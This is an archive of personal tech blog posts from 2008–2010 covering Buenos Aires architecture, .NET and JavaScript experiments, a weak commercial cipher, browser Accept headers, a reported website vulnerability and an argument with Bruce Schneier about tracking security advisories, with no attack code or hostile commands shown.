The other piece of ornamentation is the eagles near the top of the building. Above the eagles, there is what appears to be a private balcony - and above that are the towers. It looks like one of the spires has a crown on top and the other a weathervane. The bottom of the building is shop or restaurant space that is for sale.

The next building is about as opposite as you can get - but I still love it. It's an all-concrete structure built in the 60s or 70s. It's located in the banking district - near Buenos Aires' Wall Street equivalent, with narrow streets that make it impossible to get a good shot of the entire building from the street. As we move down towards the front door you can see the structure of the building opening up into a sunk-back front door. Complete with an amazing meeting room above the street.

The last building is the most beautiful building I think I have ever seen. I'll give you the glamour shot and just get it over with.

This is one of three buildings for the School of Engineering at UBA (University of Buenos Aires). The building began construction in 1912, it has a segment on the Spanish Wikipedia. The architect was a man named Arturo Prins, and there's some intrigue as to his death - my Spanish is not that great, and google translate does its best but isn't perfect - the rumor is that he committed suicide because he wasn't able to complete the building due to funding and construction miscalculations. In fact, I'm unable to determine the provenance of this photo but if you were to take it at face value - the building is only half as tall as it should be!

As you move around the building, the most striking feature to me is the dual balconies. (I'm actually not entirely sure they are balconies - they may be inaccessible except for climbing through windows - but I would find that difficult to believe.) The first balcony is immense - large enough for a snazzy cocktail party overlooking the street. It reminds me of Gaudí's immense plaza above a plaza in Park Güell in Barcelona. Above that is smaller balcony that reminds me of the elite of the elite looking down on their subjects. (Okay, actually, it reminds me of the balcony scene in the first Spider-Man.)

Slide around the corner, and you see another balcony running along the side of the building. If there was ever a place to hold a fancy reception on a Spring Evening - this would surely be it. Looking at it from the back, we can see that it is rather massive. However, it has also acquiesced to time. A giant tower projects out of it, and it is in poor repair. Grass grows out of its roof, the entire thing needs to be repointed to repair the brickwork (and having looked into that for a building much smaller - I can tell you that's a >$10m project), and I'm not sure why but there are support beams protruding from some corners and areas. There seems to be a large family of cats living in its backyard also.

I don't know what will happen to this building - The Engineering School has two other, much newer and much larger buildings. This particular building is in a very nice area of town, with a lot of shops and even more apartment buildings, next to a park, on a major street. Taken all together... it wouldn't look good. I don't know if it's protected by any laws, if it's being repaired, or any rumors regarding its fate. But I sincerely hope it gets repaired, and in a manner that preserves the look of it (specifically the brick coloring). In closing, I'll leave you with my favorite place to be in all of Buenos Aires.

simple crypto pack

17 Jan 2010 20:43:00 EST

Every so often I run into some simple (or not-so-simple) cipher and I'm curious what it means. And every time I end up writing the same PHP scripts to shift all the letters and try various vigenere keys. I figured I might as well just write them well once and be done with it. ("Well", is of course, relative.) They're not all that sophisticated, and they're not designed to be "fire-and-forget", they require you to do some analysis yourself and find what fits. But maybe they'll help you with the newspaper cryptogram.

The code is available on github.

Also, to my 12 rss readers, who were inundated by a complete push of all my old articles - I apologize. I redid the guids for the posts, when I rewrote my site this weekend (yes, again), so they were pushed to you as duplicatess.

bruce schneier is wrong

28 Dec 2009 21:45:23 EST

Bruce Schneier is wrong. There, I said it. Specifically, he's wrong in one of his recent essays Reacting to Security Vulnerabilities, and he's wrong in the suggestions he makes.

He states there are several reasons to "do nothing. ... Don't panic. Don't change your behavior. Ignore the problem, and let the vendors figure it out." They are:

It's hard to figure out which vulnerabilities are serious and which are not. ... The press either mentions them or not, somewhat randomly; just because it's in the news doesn't mean it's serious.
It's hard to figure out if there's anything you can do. ... Some vulnerabilities have surprising consequences. The SSL vulnerability mentioned above could be used to hack Twitter.
The odds of a particular vulnerability affecting you are small. There are a lot of fish in the Internet, and you're just one of billions.
Often you can't do anything. These vulnerabilities affect clients and servers, individuals and corporations. A lot of your data isn't under your direct control -- it's ... in a cloud computing application.

He then gives a list of steps you should take to protect yourself client-side: anti-virus, updates, proper configuration, common sense, and backups. Those four points aren't wrong, they're all true. But his conclusion to ignore vulnerability reports is downright careless.

For the elements (servers, people, services, etc) within your sphere of influence - you should be keeping an eye on the vulnerabilities that can affect them.

Consider a recent flaw found in IIS. If you're vulnerable, it's a pretty serious hole you have open - lots of bad things can happen. Fortunately, three things are on your side, two of which Bruce stated: the odds of you meeting the criteria are small and if it does affect you the odds of someone finding and exploiting you are small. Furthermore, good to excellent sysadmins would already be protected from this (it's a subtle/tricky thing to protect against but still oft-advised.)

But none of these things matter after you get hacked. Then it's your data on the internet, it's your ass on the line, and it's you that I want to punch in the face after you leak my credit card. You can't claim "I was waiting for the vendor" - Microsoft isn't going to apologize and make everyone's credit cards come back home. You can't stand in front of the CEO and say "The odds of this happening were so low we didn't think it was worth protecting against."

The fact of the matter is the tradeoff of reviewing vulnerabilities and at the very least being aware of what you're vulnerable to is low-cost/high-reward. Let's take a look at the cost: Add a few firehoses of information into google reader and skim through them in 5 minutes a day while having your coffee.

Do I use the app/protocol that's vulnerable? That knocks out about 95% of the reports.
Is it a client app? VLC? Windows Media Player? Don't care. These are all relegated to either social engineering exploits (Click this link! Watch this video!) or fall into the category of things you can't fix (besides trying to bar people from using the app)
Is it a public-facing service/protocol/app I care about? Go read the damn vulnerability. You're probably at about 5-10 of these a week by now - tops.
Is it fixed in a new version? Do I use the new version? Since you're hopefully staying on top of updates this will probably knock out a third of them.
How do you exploit it? E.G.: If it involves uploading a file - do you allow file uploads anywhere? No? Awesome, you're safe! You don't know? Then... how are you managing the server if you don't know what it does? (Seems like you ought to work with your colleagues a little closer.) Or lets say the way to exploit it is really complicated or not explicitly stated, like the HTTPS vulnerability. Well, the fix for it will either be easy with little to no consequences (like disabling HTTPS renegotiation or adding 17 characters in a php file to protect against a Wordpress vulnerability) - so bloody do it and don't worry about it - or it will not be so easy.
Okay, so it seems to be vulnerable and the fix isn't that easy. This probably comes around like once every 3 months. Send out an email "I think hackers can X our Y" - that'll be sure to either A) Get people to respond that you're wrong and you're safe or B) That this is serious and you're now given the resources to get it investigated and fixed. No one wants to be the guy who says "Yea, I heard we might be vulnerable, but I asked him not to investigate it."

At this point, you're probably spending an hour a week doing this. And let me tell you - there is nothing more impressive to your boss than when he comes to you to ask about something he saw in the paper or in his feedreader and you can say "Yea, I looked at that vulnerability already and [we're not vulnerable/I closed the hole]."

I didn't pull these numbers out of thin air - I manage a half-dozen web apps and a few servers in either a semi-professional or professional capacity. If you're spending significantly more time you're probably doing it in a capacity where it's a formal part of your job in which case there's nothing to complain about. Bruce Schneier is wrong - it's our responsibility to stay on top of vulnerabilities and mitigate them when we can to protect our computers, businesses, and our clients' data.

The most important thing is that it's your job to keep your stuff secure - not anyone else. If it was their responsibility - it'd be their stuff.

i have a love/hate affair with sql

10 Dec 2009 14:15:23 EST

It's so much fun to optimize but it's neither deterministic nor logical.

updated travel page

7 Dec 2009 00:15:23 EST

I updated the travel page with some GPS coordinates of my move down to Buenos Aires. I successfully navigated security with a ton of hardware in my carry-on as well as one duffel with three LCD Monitors and another duffel with an entire desktop computer. TSA checked both bags and I got my carry-on searched twice in Mexico (but not in the US!) but none of it was damaged more than cosmetically, so huge win.

comparing loop hoisting in .net

8 Nov 2009 1:24:23 EST

During the same WAN Party that I built howdyougetthatscar.com I also got into an argument with John Bristowe and Phil Haack about, in succession, the foreach loop, IEnumerable, yield return, and then LINQ - and my mostly-unjustified hatred for all of them. Especially the foreach loop. I really hate that thing.

Anyway, I didn't exactly justify myself well on these topics, so my plan this weekend was to write a long blog post explaining and proving that the foreach loop is to efficiency what the goto is to programmer sanity. But somehow I got sidetracked, and before I knew it I was actually using the extremely frightening WinDbg - something I had only seen the likes of crazy haskell programmers using.

The result of this epic sidetrack was somehow that I ended up comparing loop hoisting.

for(i=0; i

So if you want to take an adventure through IL all the way down to the Assembly, and find out which one is actually more efficient follow me down the rabbit hole.  The answer will surprise you.

how'd you get that scar?

5 Nov 2009 10:24:23 EST

Have you ever had to explain a random scar? And the real story isn't very good, so you need something better? There's a webapp for that. You're welcome internet.

I still need to add more words. And just for kicks I did it on a ridiculous framework, instead of a 5 line PHP file. I did it in ASP.Net MVC on Mono on my gentoo server. So three cheers for over-engineering.

not sleeping can be dangerous for your laptop

1 Nov 2009 10:37:23 EST

In a spurt of productivity, last night when I got home I decided that instead of sleeping, I was finally going to pave my laptop and install Windows 7. There's just one problem. My laptop is a netbook, and has no DVD drive. And after a couple hours of messing with a USB Key, I learned I can't get it to boot from a USB Key. It's probably the key, although it works fine on my desktop, but I got frustrated and decided to just install 7 from inside XP. Now I'm going to fast forward a bit and just tell you where I'm at now, not how I got there.

I am quad booting a netbook, by accident

Windows 7
Windows XP
Ubuntu 9.10
LiveCD of Backtrack 4 Pre-Release

Yes, it is a LiveCD, not an install, it reverts everytime I restart, and only take up a gig of space. It's a pretty novel idea, but it wasn't at all what I wanted. And on top of that, I still have two big blocks of unpartitioned space that I can't combine or move around.

And the worst part of this is that nothing works right. I can't get Windows 7 to let NetworkStumbler or Wireshark use my wireless connection, I can't get Ubuntu or Backtrack to even see my wireless connection, they certainly don't enable the touchscreen (although 7 does). The only operating system that actually works completely is the old one - XP. I can't move the partitions around. Frankly, I don't even know where or how Ubuntu installed itself! It seriously does not have it's own partition -according to what I can see, I think it installed itself inside of a disk container sitting on the ntfs filesystem of my XP partition and is coexisting somehow but that is madness! And most frustratingly I can't repave the machine cause I can't get it to boot from an outside source! I may try and use linux to overwrite the partition table and install a bootloader with images of the install dvds sitting in random spots of the hard drive, but that seems very careless and frought with peril.

On the other hand - I really really really really want someone to confiscate my netbook and try doing forensics on it cause I would laugh for a long time when they image it and start trying to figure out just what the heck is going on!

How to break the internet: Follow Standards

29 Oct 2009 11:07:23 EST

This probably isn't news to anyone, but the only reason society functions is because people break the rules. If everyone followed all the rules, we'd always be stuck in traffic. Oh and the internet would break.

I'm not even talking about boring stuff like writing CSS how it's supposed to be written - I'm talking about instead of sending a browser the HTML page, how about sending it what it actually requests. You know, a ClickOnce App. You see, there's the concept of an Accept Header that a browser sends, that's supposed to control what the webserver sends you in response. If you ask for HTML, it sends HTML, if it asks for XML, it sends XML, if you ask for JSON - json. Seems reasonable right? It's all REST-y and full of best practices warm fuzzy goodness. You almost want to cuddle up with it it's so happy-feely. Except if anyone actually obeyed it everything would break.

You see, Windows provides a way to hook into the Accept Header that IE sends, and as Raymond Chen is so apt to point out - if you give developers a way to do something, they're gonna abuse it. So, if you happen to run Internet Explorer (with Office installed), this is what your browser is sending:

  GET /web/index.html HTTP/1.1
  Host: RecessFramework.org
  Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
        application/vnd.ms-xpsdocument, application/xaml+xml,
        application/x-ms-xbap, application/x-shockwave-flash,
        application/x-silverlight-2-b2, application/x-silverlight,
        application/vnd.ms-excel, application/vnd.ms-powerpoint,
        application/msword, */*

So you're requesting, in order, a gif, a jpeg, a pjpeg, and then a ClickOnce App. And then a bunch of other Office apps and shit.

Now you can imagine just how quickly someone would get fired at Google, CNN, or Yahoo for deciding to actually honor IE's request. Good thing everyone ignores the Accept Header huh? (On the other hand, it's yet another way to identify IE users independent of User Agent...)

For more details on the header, what different browsers send, and some responses from the IE and Webkit teams, check out Kris Jordan's excellent post Unacceptable Browser HTTP Accept Headers (Yes, You Safari and Internet Explorer).

being prepared

14 Oct 2009 11:55:23 EST

It's rare for me to write an essay, as opposed to code, but this is something I've been thinking about recently. Someone's been ribbing me recently about "being prepared" - partially because I happen to be an Eagle Scout, but partially because I also happen to always be prepared. I suppose I do fit the superficial model of being prepared. I carry a pocketknife on me, I have a change of clothes in my trunk, I keep emergency cash handy, I try not to let my gas tank get too empty, and so on. But as I've grown older, I've discovered there are three parts to "being prepared".

First and foremost is what you have. It's the easiest, it's the most superficial. If you're going camping and you're not bringing duct tape - you're not prepared. Same with a first aid kit, cleaning supplies, or a tent. This is what most people think of when they hear "that guy is prepared". They hear "that guy has a lot of crap". And it's handy, don't get me wrong. It can get you out of jams - once I landed in Madrid, completely alone, and discovered that when they say the Mastercard would "work everywhere" what they meant was "it'll work anywhere it's accepted" - which was nowhere in Spain or France. Lucky I had a hundred USD to change and get a metro ride into the city where I could get to a bank. Here's the thing though - it's not important. At least, not compared to the other ones.

The next part of being prepared is what you know. If you've got a snakebite kit and no idea how to use it, but you saw on TV that some guy made hash marks with a knife and sucked out the venom - congrats you're a detriment to your friend's life. You need to know what to do and how to do it when you find yourself in an emergency. Whether it's first aid because someone just cut their artery on a kitchen knife, or you're getting mugged in a foreign city. Here's an example of not knowing what to do. My car broke down - the engine overheated. A guy stops, and drops off two gallons of water - then he takes off. I have a gallon of coolant in my trunk (that's right, I had everything I needed). And what did I do? I fake-remembered that water cools better than coolant, so I dumped the water in the radiator, and started driving. I didn't get too far - I just boiled off all the water. Coolant has a higher boiling point than water. That's why you mix them. I had everything I needed to accomplish my goal, but I failed because I didn't know what to do.

The last part of being prepared is the most subtle. You have to keep yourself together under pressure. This is often what people consider manliness to be - keeping a rational head in the midst of a crisis and delaying your emotional reaction so others can rely on you. If you have a T-Shirt and you know to apply pressure and keep the wound elevated, but you can't hold it together at the sight of a lot of blood - you're not helping anyone. Or closer to home - your car just broke down. In 5mph bumper-to-bumper traffic, no shoulder, as a lane is merging in from the right, in a tunnel. What do you do? I've been there. And I'm not going to say I handled myself flawlessly. I snapped at my friend that I was doing the best I damn well could. But I survived, and it could have been a whole lot worse if I didn't hold myself together as well as I did.

So here's the thing guys (and gals). Being prepared is an admiral quality and don't let anyone tell you differently. But it's more than how much crap you have in your pockets. So start easy - take the baby steps. Put a first aid kit in your car, an extra twenty behind your mom's photo, and a roll of duct tape in your camping supplies. Now, go take a CPR class, ask your EMT friend how to treat a half-severed finger or a cut vein or artery. Then practice it, remember it, and refresh your memory until it's more than memory - it's a reaction. They don't call it muscle memory for nothing. Finally, here's the hardest thing to do: push your comfort zone. Do things that make you nervous; whether it's ordering at that fast-paced no-nonsense deli or navigating a new city by yourself. Build up your confidence. Then when you get into a jam - just stop, breathe, and remember, you've handled lots of other difficult things and you can handle this. That way the next time your car breaks down - you won't.

super cool javascript hackery

11 Oct 2009 11:08:23 EST

This is a post I've had in the works for months now. It's about modifying javascript functions on the fly. I know, that's old hat, you can replace the function to do whatever. That's not what I'm talking about. I'm talking about modifying the function in place to do something slightly different... using string manipulation. I know, horrible idea, ridiculous maintenance, tons of regressions. I'm not advocating it's use - I'm saying it's damn cool. And what's more, javascript is the only language you can do it in (that I've heard of or seen). So check it out, and decry my abuse of the language and see how I show you that you can't do it in Lisp. Really.

server configuration published

16 Sep 2009 9:21:23 EST

I run a gentoo server as my router. It acts as a firewall, router, DNS and DHCP server, a media server, backup, and does some other useful stuff, like segmenting random strangers using my wireless from my computers - helps prevent worms. Something I've been working on for a little bit is getting all my the scripts I use to run it published. I've finally finished. So at this link you can find an explanation of how things work, all the scripts, and some of the more complicated config files.

crypo.biz followup

15 Aug 2009 14:20:23 EST

After I posted my last article about crypo.biz and their "military-grade encryption algorithm" I got an e-mail from the author of the site and code. I called him out on his code, and he called me out - sending me a giant encrypted message and challenging me to break it. Fair's fair, now I have to put my money where my mouth is.

people who shouldn't do crypto, doing crypto PART 2!

08 Aug 2009 00:12:23 EST

I didn't really think this would turn into a series, but part 2 has arrived! crypo.biz is a site boasting Military Grade 1280-bit Encryption Algorithm. Now that your bullshit detector has gone off, you can read about their shoddy algorithm and see the reverse-engineered code. I wanted to build a cracker for it, but I spent a while getting back into C, and decided I shouldn't spend much more time on this project, so I submitted it to reddit for others to look at.

finally put up a travel page

15 Jun 2009 00:02:23 EST

So there's a million things I could have done and I didn't really do any of them - but I finally put up the travel page with some actual content. It's just a google map with some trip lines drawn and cities pinned. No info-windows, no stories, nothing too revolutionary. If you want to here the gory, sexy, gritty details - buy me a drink.

people who shouldn't do crypto, doing crypto

16 May 2009 22:12:15 EST

Does this disqualify me from no more free bugs? I found a pretty horrific security vulnerability in a website not to be named, and reported it. It was silly-easy to exploit, there was no particular cleverness on my end. I've put up a new code adventure about it. Suffice to say I could have done an awful lot of incredibly dangerous (and lucrative!) theft, and if I did it wrong I would have gone to jail for a longish time. When I found it, and successfully exploited it, I sat back, and remembered something Richard Feynman said in one of his books.

I went on and checked some things, which fit, and new things fit, new things fit, and I was very excited. It was the first time, and the only time, in my career that I knew a law of nature that nobody else knew. The other things I had done before were to take somebody else's theory and improve the method of calculating

So this was the first time (so far) that I knew some incredible zero-day that no one else knew. And I rushed out to explain it to my roommate and I was excited. So read about it, and then you'll think we'll that's obvious and of course it is. But out of the thousands and thousands who could have found it and exploited it - I did it.

reading list

11 May 2009 22:12:00 EST

this must be house-cleaning time, because in addition to my bucketlist, I've also published my RSS reading list in OPML format. It easy enough to read that you can skim it or if you're super-hardcore you can import the whole thing and weed out the lists you don't like!

the bucket list

7 May 2009 21:01:00 EST

I've finally gotten around to publishing a list I wrote up for Boldly Go Solo after they published an off-the-cuff list of extreme items. I suspect it will be published there soon, but I wanted to clear out my queue and put something new on the blog. So without further adieu, check out my list of over a hundred extreme sports, events, destinations, and things to do before you die.

hacking .net's clr

26 Apr 2009 13:08:00 EST

After Devscovery I've been trying to decipher the magic behind .Net lately, reading the beginning chapters of CLR via C# and playing around. Well I'm not quite sure what prompted me to do this, but I ended up looking into the binary of the assemblies produced by a simple Hello World program. I diffed the assemblies between two runs on the same machine, between two runs on different machines, and between Debug and Release mode. Most of it wasn't too surprising, I think the biggest surprise was in just how much I was able to figure out. If I knew PE Headers as well as some people I'd have deciphered even more. If you have a demented mind as mine, you can read the article and enjoy the hex: hacking the clr: diffing assemblies.

rss feed!

19 Apr 2009 14:29:00 EST

I am no longer a hyprocrite. I implemented an RSS feed for the site. It was a little tricky, considering I don't use a database or anything of the sort, but it works (I think). I outlined how I did it in an update of my code adventures - making the site post.

authentication poc

07 Apr 2009 16:29:00 EST

I added a new Proof of Concept - this one on an authentication idea I had for lost passwords. Secret Questions suck, picking your own secret question sucks. Filling out a form of 100 items really sucks. Picking a few questions to answer out of 100 questions sucks because you have to read them all. But if we organize the questions in a way that they're very easy to "skim" we can present the user or attacker with 100 choices of questions to answer.

I also changed around some styles to try and make the site more readable.

rfid reader

04 Apr 2009 16:17:00 EST

This is what I really worked on two weeks ago. I wired up an RFID Reader to a bowl of candy and had the router freak out whenever someone took a piece. Read about it in Code Adventures: RFID Experimentation.

code update

22 Mar 2009 12:42 EST

I updated the site just a tad. Some CSS tweaks on the menu (it will now stay fixed as you scroll) and a javascript tweak I detailed in the appropriate adventure.

right... I was doing that all along!

11 Feb 2009 13:34 EST

If you've seen my Bastardizing a Backup Adventure in Code, I should note that there's this really cool thing called webhooks that work like that. And they're actually pretty useful, and awesome, and I totally was following that model when I came up with my crazy ass idea. Yea. Totally

Seriously though, it's always enjoyable when you discover that some idea you came up with independently is an actual useful item. It's usually fleshed out a little bit better, and you rarely have the idea first, but it's cool.

why I hate perl

18 Jan 2009 12:36 EST

Just so you know guys, this is why everyone who does know how to program well in some other language hate perl.

if(false){
print "Seriously.  What the fuck.";
}

I bet there's some semi-logical reason, once you know gobs of perl, why this would possibly make sense. But for everyone else it cannot make any sense at all. And there are dozens of similar little things that prevent you from writing more than 5 lines at a time without testing them to make sure they do exactly what you think they should do.

i got project upstream-ed

06 Jan 2009 12:17 EST

Project Upstream is a social network experiment that randomly connects two people via an AIM connection. Here's a better description. Suffice to say I tweeted at work, and got Project Upstream-ed. I googled the screenname immediately to figure out what was going on, found a list, and then read about the project.

Session Start (MyScreenname:accusatorycoho): Tue Jan 06 11:58:26 2009
[11:58] accusatorycoho: I hope your day is wonderfully amazing, just like you!
[12:01] accusatorycoho: eh?
[12:01] MyScreenname: yea - happened to me too. it's a social networking experiment. i didn't actually send you the IM
[12:02] MyScreenname: look here: http://innerworkingsofaspacecase.blogspot.com/2008/07/project-upstream.html
[12:02] MyScreenname: and i'm not sure what screenname you see; but it isn't mine. (neither of us has any idea who the other is)
[12:02] accusatorycoho: okay, and?
[12:03] MyScreenname: and nothing. they expect us to chat or something. i dunnoe.
[12:03] accusatorycoho: oh, weird.
[12:04] MyScreenname: it's an interesting concept; but i'm at work so i can't really chat.
[12:04] MyScreenname: have a nice day though
[12:04] accusatorycoho: you as well.
[12:04] accusatorycoho: later

man in the middle attack

2 Jan 2009 23:17 EST

Two updates in one day?! Crazy! Anyway, I thought this was too interesting not to post. Here's a man-in-the-middle attack out in the wild. The person actually thought it was a Firefox bug, because of all the invalid SSL certificates they got. After some investigating - yup, she was getting haxxed.

fastest data transfer protocol

2 Jan 2009 13:48 EST

In case you were wondering, I started comparing the transfer speeds of different protocols. I stopped after three. The data was being transfered onto a RAID-6. Results:

Method	Bytes	Time	Speed
smb mount then cp	733960192	425	1.647 MB/s
scp	730253312	69.48*	10.0241 MB/s
wget using http	736274432	63.2	11.1097 MB/s

There's two items to note here:

scp includes the time it took my to type in my 40+ character password. Subtract out at least 3-4 seconds.
scp and wget actually locked up my network connection. putty timed out. top indicated than an entire core was dedicated to the copy.

So there you go - if you need to transfer several hundred gigabytes, use scp.

Update (1/3/2009): Having desired the comparison facilities of rsync, I can add that rsync over ssh compares favorably, and is in the same neighborhood as straight ssh.

adventure in code added

2 Nov 2008 16:11 EST

A horrible experiment gone wrong from last weekend has been immortalized on the new adventures in code section. I'm hoping people won't read it and judge me harshly - I posted it as a joke demonstrating a horrible idea.

proof of concept added

28 Oct 2008 21:57 EST

I've been shuffling things around and adding links here and there, but I just put up the first significant content the other day, a Proof of Concept I thought up. Jeff at CodingHorror and StackOverflow had mentioned on the Hanselminutes podcast that they weren't able to do page-level caching because the page is dynamic. That's true, but I got to thinking - I can get around that. And the result is posted - check it out if you're curious.